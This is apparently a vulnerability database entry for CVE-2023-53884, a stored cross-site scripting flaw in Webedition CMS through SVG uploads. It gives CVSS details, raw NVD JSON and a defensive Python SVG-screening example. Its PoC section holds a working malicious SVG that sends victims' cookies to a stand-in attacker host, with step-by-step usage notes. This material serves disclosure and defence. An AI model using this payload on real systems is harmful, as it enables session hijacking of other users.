Security Vulnerability Report
CVE-2023-53884 CVSS 5.4 MEDIUM

CVE-2023-53884

Published: 2025-12-15 21:15:51
Last Modified: 2025-12-18 21:44:30

Description

Webedition CMS v2.9.8.8 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files through the media upload feature to inject and execute arbitrary scripts when the file is viewed by other users.
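The description above states the mechanism: an SVG is an XML document, so it can carry <script> elements, on* event-handler attributes, javascript: links and embedded HTML, and a CMS that accepts one through its media upload and later renders it in its own origin for other users hands that script the viewer's session. The following is an added example, not Webedition code and not part of the advisory, of the server-side screening an upload handler would apply before accepting an SVG. All function names and the sample documents are constructed for this illustration.

```python
"""Server-side screening of uploaded SVG files (added example, not Webedition code).

An SVG is an XML document, so it can carry <script> elements, on* event
handler attributes, javascript: links and embedded HTML. This check walks
the parsed tree and reports every such construct so an upload handler can
reject the file. Function names and sample documents are constructed here.
"""
import re
import xml.etree.ElementTree as ET

# Elements that execute script, embed HTML, or can rewrite other
# attributes at render time (animate/set can retarget an href).
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object",
                   "animate", "set"}

# URL schemes that turn a link or reference into executable content.
EXECUTABLE_URL = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)


def local_name(qualified: str) -> str:
    """Strip ElementTree's '{namespace}name' prefix from a tag or attribute."""
    return qualified.rsplit("}", 1)[-1]


def find_active_content(svg_bytes: bytes) -> list[str]:
    """Return the reasons the document must be rejected (empty list = clean)."""
    lowered = svg_bytes.lower()
    # Refuse DOCTYPE/ENTITY before parsing: entity expansion is a parser
    # DoS risk and nothing an image needs. Editor exports that include a
    # DOCTYPE header are rejected by this policy as well.
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        return ["DOCTYPE or ENTITY declaration present"]
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # Covers comments before the XML declaration, truncated files, etc.
        return [f"not well-formed XML: {exc}"]

    findings: list[str] = []
    if local_name(root.tag) != "svg":
        findings.append(f"root element is <{local_name(root.tag)}>, not <svg>")
    for element in root.iter():
        name = local_name(element.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"active element <{name}>")
        for attribute, value in element.attrib.items():
            attr_name = local_name(attribute)  # xlink:href arrives namespaced
            if attr_name.lower().startswith("on"):
                findings.append(f"event handler attribute {attr_name} on <{name}>")
            elif attr_name == "href" and EXECUTABLE_URL.match(value):
                findings.append(f"executable URL in href on <{name}>")
    return findings


def is_safe_svg(svg_bytes: bytes) -> bool:
    """Accept only documents with no findings."""
    return not find_active_content(svg_bytes)


# Constructed samples: one benign image and minimal markers of the
# constructs the filter must catch (they are not working payloads).
BENIGN_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <rect width="100" height="100" fill="#ccc"/>
</svg>"""

REJECTED_SAMPLES: dict[str, bytes] = {
    "script_element": b'<svg xmlns="http://www.w3.org/2000/svg">'
                      b'<script>/* marker */</script></svg>',
    "event_handler": b'<svg xmlns="http://www.w3.org/2000/svg" onload="marker"><rect/></svg>',
    "javascript_href": b'<svg xmlns="http://www.w3.org/2000/svg" '
                       b'xmlns:xlink="http://www.w3.org/1999/xlink">'
                       b'<a xlink:href="javascript:marker"><rect/></a></svg>',
    "foreign_object": b'<svg xmlns="http://www.w3.org/2000/svg"><foreignObject>'
                      b'<div xmlns="http://www.w3.org/1999/xhtml">x</div>'
                      b'</foreignObject></svg>',
    "comment_before_declaration": b'<!-- c --><?xml version="1.0"?>'
                                  b'<svg xmlns="http://www.w3.org/2000/svg"/>',
    "entity_declaration": b'<!DOCTYPE svg [<!ENTITY x "y">]>'
                          b'<svg xmlns="http://www.w3.org/2000/svg"/>',
}


if __name__ == "__main__":
    print("benign accepted:", is_safe_svg(BENIGN_SVG))
    for label, sample in REJECTED_SAMPLES.items():
        print(f"{label}: {find_active_content(sample)}")
```

Screening is defence in depth, not the whole fix: an accepted SVG should still be served with Content-Disposition: attachment or from a separate media origin, with X-Content-Type-Options: nosniff and a restrictive Content-Security-Policy, so that anything the filter misses never runs in the application's origin. For untrusted XML in production, prefer defusedxml over the stdlib parser; the DOCTYPE pre-check here only covers the case the example chooses to reject outright.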

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:webedition:webedition_cms:2.9.8.8:*:*:*:*:*:*:* - VULNERABLE
Webedition CMS v2.9.8.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Malicious SVG file for CVE-2023-53884 PoC -->
<!-- This PoC demonstrates stored XSS via SVG upload in Webedition CMS -->
<!-- The XML declaration must be the first bytes of the file, and the script body is
     wrapped in CDATA so the '<' characters inside it do not break XML parsing -->
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script type="text/javascript"><![CDATA[
    // Steal session cookies and send to attacker server
    var cookies = document.cookie;
    var attacker_server = "https://attacker.example.com/steal?data=" + encodeURIComponent(cookies);

    // Create image element to exfiltrate data
    var img = new Image();
    img.src = attacker_server;

    // Display alert for PoC demonstration
    alert('XSS Executed - CVE-2023-53884\nCookie: ' + cookies);

    // Additional payload: DOM manipulation
    document.body.innerHTML = '<h1>Malicious SVG Executed</h1><p>Your session has been compromised.</p>';
  ]]></script>

  <!-- Visual element to make SVG appear legitimate -->
  <rect width="300" height="200" fill="#f0f0f0" stroke="#333" stroke-width="2"/>
  <text x="150" y="100" text-anchor="middle" font-family="Arial" font-size="16" fill="#333">
    Malicious SVG File
  </text>
</svg>

<!-- Usage: -->
<!-- 1. Obtain low-privilege account on Webedition CMS -->
<!-- 2. Navigate to media upload functionality -->
<!-- 3. Upload this SVG file -->
<!-- 4. When other users view the SVG, the JavaScript executes -->
<!-- 5. Attacker receives victim's cookies via the defined endpoint -->

References

https://www.exploit-db.com/exploits/51662 (Exploit)
https://www.vulncheck.com/advisories/webedition-cms-v-stored-cross-site-scripting-via-svg-upload (Third Party Advisory)
https://www.webedition.org/ (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53884", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:51.420", "lastModified": "2025-12-18T21:44:29.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Webedition CMS v2.9.8.8 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files through the media upload feature to inject and execute arbitrary scripts when the file is viewed by other users."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webedition:webedition_cms:2.9.8.8:*:*:*:*:*:*:*", "matchCriteriaId": "A7A06534-7ECF-4DC7-BCF2-EAD8F9519E7B"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51662", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/webedition-cms-v-stored-cross-site-scripting-via-svg-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.webedition.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51662", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}